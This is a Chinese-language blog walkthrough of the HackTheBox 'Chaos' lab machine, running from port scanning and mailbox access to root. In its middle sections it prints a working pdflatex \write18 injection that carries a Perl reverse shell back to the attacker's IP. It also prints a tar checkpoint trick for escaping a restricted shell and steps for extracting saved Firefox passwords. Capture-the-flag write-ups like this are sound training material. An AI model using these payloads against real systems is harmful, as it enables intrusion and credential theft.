超越平凡的生活
14 May 2019
Chaos (HTB 靶机测试)
0x00
前期准备 进入到HTB acces页面配置vpn
下载对应的配置 openvpn xx.ovpn 文件
配置好对应网络
从页面上就可以看到是否连接成功/ipv4地址/ipv6地址/流量/服务器地址/服务器端口
然后进入靶机场 挑选合适的靶机进行练手
0x01
- 靶机地址
- 目标ip 10.10.10.120
- 本机ip 10.10.14.37
- 本机增加靶机路由
- 使用nmap 扫描一下端口
nmap -sS 10.10.10.120
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-09 06:18 EDT
Nmap scan report for chaos.htb (10.10.10.120)
Host is up (0.23s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
80/tcp open http
110/tcp open pop3
143/tcp open imap
993/tcp open imaps
995/tcp open pop3s
10000/tcp open snet-sensor-mgmt
Nmap done: 1 IP address (1 host up) scanned in 3.08 seconds
有80看看80有啥信息么 没有啥信息 叫我们不能直接用ip访问 这个梗后面会有体现
curl 10.10.10.120
<h1><center><font color="red">Direct IP not allowed</font></center></h1>
- dirb http://10.10.10.120 看看有啥发现 遍历web页面目录 真有发现 找到了 http://10.10.10.120/wp 有东西 找到一个博客 http://10.10.10.120/wp/wordpress 里面要用户名和密码登录
0x02
-
思路1 在浏览器上输入?author=1就会发现下面出现了作者的名字 human。这时候我们就把名字输入Password里面去
-
思路2 用wpscan 看看有啥发现 wpscan –urlhttp://10.10.10.120/wp/wordpress -e 也呢发现对应的用户名
输入进去 可以查看到页面也webmail 账号名和密码ayush/jiujitsu
dirb http://10.10.10.120
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu May 9 06:24:30 2019
URL_BASE: http://10.10.10.120/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.120/ ----
+ http://10.10.10.120/index.html (CODE:200|SIZE:73)
==> DIRECTORY: http://10.10.10.120/javascript/
+ http://10.10.10.120/server-status (CODE:403|SIZE:300)
==> DIRECTORY: http://10.10.10.120/wp/
---- Entering directory: http://10.10.10.120/javascript/ ----
==> DIRECTORY: http://10.10.10.120/javascript/jquery/
---- Entering directory: http://10.10.10.120/wp/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.120/javascript/jquery/ ----
+ http://10.10.10.120/javascript/jquery/jquery (CODE:200|SIZE:268026)
-----------------
END_TIME: Thu May 9 07:20:53 2019
DOWNLOADED: 13836 - FOUND: 3
0x03
- 连接imap openssl s_client -connect 10.10.10.120:993`
- 输入 a LOGIN ayush jiujitsu
- 这里的a是代号,顺便输入也行, LOGIN 是固定的,ayush是账号,jiujitsu是密码
- 输入a list “” * 查看有些啥
- 输入a select Drafts 草稿箱有内容 发现有邮件 那么我们就看下这邮件里面有什么可利用的信息。
- 输入a fetch 1 body[text] 得到相关信息内容
- 退出a logout
$ tag fetch 1 body[text]
* 1 FETCH (BODY[TEXT] {2183}
--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII;
format=flowed
Hii, sahay
Check the enmsg.txt
You are the password XD.
Also attached the script which i used to encrypt.
Thanks,
Ayush
--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: application/octet-stream;
name=enim_msg.txt
Content-Disposition: attachment;
filename=enim_msg.txt;
size=272
MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9
RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M
7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e
6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge
+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=
--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: text/x-python; charset=us-ascii;
name=en.py
Content-Disposition: attachment;
filename=en.py;
size=804
ZGVmIGVuY3J5cHQoa2V5LCBmaWxlbmFtZSk6CiAgICBjaHVua3NpemUgPSA2NCoxMDI0CiAgICBv
dXRwdXRGaWxlID0gImVuIiArIGZpbGVuYW1lCiAgICBmaWxlc2l6ZSA9IHN0cihvcy5wYXRoLmdl
dHNpemUoZmlsZW5hbWUpKS56ZmlsbCgxNikKICAgIElWID1SYW5kb20ubmV3KCkucmVhZCgxNikK
CiAgICBlbmNyeXB0b3IgPSBBRVMubmV3KGtleSwgQUVTLk1PREVfQ0JDLCBJVikKCiAgICB3aXRo
IG9wZW4oZmlsZW5hbWUsICdyYicpIGFzIGluZmlsZToKICAgICAgICB3aXRoIG9wZW4ob3V0cHV0
RmlsZSwgJ3diJykgYXMgb3V0ZmlsZToKICAgICAgICAgICAgb3V0ZmlsZS53cml0ZShmaWxlc2l6
ZS5lbmNvZGUoJ3V0Zi04JykpCiAgICAgICAgICAgIG91dGZpbGUud3JpdGUoSVYpCgogICAgICAg
ICAgICB3aGlsZSBUcnVlOgogICAgICAgICAgICAgICAgY2h1bmsgPSBpbmZpbGUucmVhZChjaHVu
a3NpemUpCgogICAgICAgICAgICAgICAgaWYgbGVuKGNodW5rKSA9PSAwOgogICAgICAgICAgICAg
ICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBlbGlmIGxlbihjaHVuaykgJSAxNiAhPSAwOgog
ICAgICAgICAgICAgICAgICAgIGNodW5rICs9IGInICcgKiAoMTYgLSAobGVuKGNodW5rKSAlIDE2
KSkKCiAgICAgICAgICAgICAgICBvdXRmaWxlLndyaXRlKGVuY3J5cHRvci5lbmNyeXB0KGNodW5r
KSkKCmRlZiBnZXRLZXkocGFzc3dvcmQpOgogICAgICAgICAgICBoYXNoZXIgPSBTSEEyNTYubmV3
KHBhc3N3b3JkLmVuY29kZSgndXRmLTgnKSkKICAgICAgICAgICAgcmV0dXJuIGhhc2hlci5kaWdl
c3QoKQoK
--=_00b34a28b9033c43ed09c0950f4176e1--
)
tag OK Fetch completed (0.006 + 0.000 + 0.005 secs).
0x04
-
发现里面有两个文件,一个enim_msg.txt, 一个是 en.py 将这两个文件进行base64解码
- 第一个解码文件
0000000000000234®سpK8ZC͵9䮫WҦw⦱[蟻9.3«C¹ؚ¬ɻ¬ֳ¸¢¾R`n 퍦3¢>}3A¾·FY ȢYDo!r#~鸎慡4❄®¶á>)KM^纻Iԅlª¢ݨBYqˏRM·ߟ.w֊¢F̀mɹ JD5~ࠨͬ}0¦?ӕ½qX(ز¿]wO - 第二个解码文件 加密算法
def encrypt(key, filename):
chunksize = 64*1024
outputFile = "en" + filename
filesize = str(os.path.getsize(filename)).zfill(16)
IV =Random.new().read(16)
encryptor = AES.new(key, AES.MODE_CBC, IV)
with open(filename, 'rb') as infile:
with open(outputFile, 'wb') as outfile:
outfile.write(filesize.encode('utf-8'))
outfile.write(IV)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += b' ' * (16 - (len(chunk) % 16))
outfile.write(encryptor.encrypt(chunk))
def getKey(password):
hasher = SHA256.new(password.encode('utf-8'))
return hasher.digest()
-
偷懒直接谷歌扒拉一个加密/解密脚本
- python crypto.py -d enim_msg_base64.txt -p sahay 他前面说了sahay就是密钥
- 得到了一个base64加密的字符串enim_msg_base64.txt
SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK
-
解析得到了一个地址 这时候告诉你不能直接访问 跟上面第一次访问的梗对应上了
可以用http//chaos.htb 访问 其实这里面就隐藏信息两个账户 sahay/ayush
base64 -d enim_msg_base64.txt
Hii Sahay
Please check our new service which create pdf
p.s - As you told me to encrypt important msg, i did :)
http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3
Thanks,
Ayush
0x05
- 打开浏览器登录 http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3
-
来看下这个http地址有什么可以利用的信息,发现这是一个txt转pdf的插件,
发现是pdflatex攻击,给出对应的学习链接。
点击create pdf,在创建pdf的同时会执行命令,直接反弹shell.
-
网页提示只有一个模板可以被使用,尝试后发现是test3模板,输入正文并点击生成按钮后,
网页并不会有直接的提示,需要启用开发者模式获得结果,生成的pdf在路径
http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/pdf/
- 对应的payload 需要修改自己的ip地址
\immediate\write18{perl -e 'use Socket;$i="10.10.14.37";$p=6666;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'}
- 本机监听 nc -vnlp 6666 页面执行对应的payload 进入到www-data账户下 执行
$ python -c 'import pty; pty.spawn("/bin/bash")'
$su ayush
Password:jiujitsu
-
切换至ayush的会话中,但这是一个rbash,环境变量被设置在/home/ayush/.app中,拒绝了绝大多数的命令,
经过尝试dir可以正常执行,在.app目录中有tar,这里使用tar来逃逸rbash,学习链接
逃逸POC:tar cf /dev/null testfile –checkpoint=1 –checkpoint-action=exec=/bin/bash
获得正常bash后,添加环境变量export PATH=$PATH:/usr/bin/,打印出user.txt
eef39126d9c3b4b8a30286970dc713e1
0x06
- 尝试root权限 .Mozilla是否存放有有关root的密码
- 路径/home/ayush/.mozilla/firefox/bzo7sjt1.default
- 本地下载GitHub - unode/firefox_decrypt: Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox/Thunderbird/Seabird) profiles 利用nc上传到靶机
nc -l -p 39808 > firefox_decrypt.py #client接收
nc -w 3 10.10.10.120 39808 < firefox_decrypt.py #host传送
- 执行命令 `````` /usr/bin/python3 firefox_decrypt.py /home/ayush/.mozilla/firefox/ Master Password for profile /home/ayush/.mozilla/firefox/bzo7sjt1.default: jiujitsu
Website: https://chaos.htb:10000 Username: ‘root’ Password: ‘Thiv8wrej~’ ``````
- 切换root 获取root.txt 4eca7e09e3520e020884563cfbabbc70
0x07
- wp相关漏洞是否需要展开利用
- python -c ‘import pty; pty.spawn(“/bin/bash”)’
- tar 命令逃逸
- sahay 账号密码也是Thiv8wrej~
- grep “Direct “ ./ -iRn
0x08
参考: